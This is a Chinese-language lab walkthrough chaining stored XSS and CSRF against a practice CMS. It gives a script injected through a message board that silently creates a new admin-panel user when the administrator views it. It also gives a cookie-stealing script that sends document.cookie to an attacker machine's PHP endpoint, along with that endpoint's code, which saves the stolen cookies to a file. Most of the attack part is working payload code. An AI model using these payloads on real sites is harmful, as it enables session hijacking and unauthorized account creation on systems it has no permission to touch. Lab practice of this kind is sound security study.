csrf+xss组合拳

一、环境搭建

靶场cms文章管理系统

二、流程开始

这是系统前端

系统管理后台

而我们要打到后台管理员的cookie，结合前端存储型的xss完全可以实现，那后端怎么被打到cookie呢，我们来从这里添加用户开始分析数据包来说明

看看数据包。其中提交的字段是act=add（添加），username、password

那我们通过编写恶意js

<script>
var xmlhttp = new XMLHttpRequest(); 
xmlhttp.open("POST", "http://192.168.137.45/cms/cms/admin/user.action.php", false); 
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 
xmlhttp.send("act=add&username=waou&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); 
</script>

寻找前端存储型xss，在这里留言板

去后台查看很明显插入了

我们把我书写的恶意js插入进去，这段恶意js创建的是waou用户，插入看看吧

插入成功

看看结果waou是否被创建

成功，不一定添加管理员，也可以盗取cookie，这个漏洞的最大问题还是存储型漏洞，这个框架也没用csrf防御的tokle值，所以导致管理员点击后直接创建新管理员

盗取cookie：

<script>
    var cookie = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "http://192.168.137.45/ceshi/cookie.php?cookie=" + encodeURIComponent(cookie), true);
    xhr.send();
</script>

攻击机192.168.137.45接收

<?php
if (isset($_GET['cookie'])) {
    $cookie = $_GET['cookie'];
    $file = 'cookie.txt';
    if (file_put_contents($file, $cookie) !== false) {
        echo "Cookie has been saved to cookie.txt";
    } else {
        echo "Failed to save cookie.";
    }
} else {
    echo "No cookie received.";
}
?>

访问之后可以看到cookie已经被盗取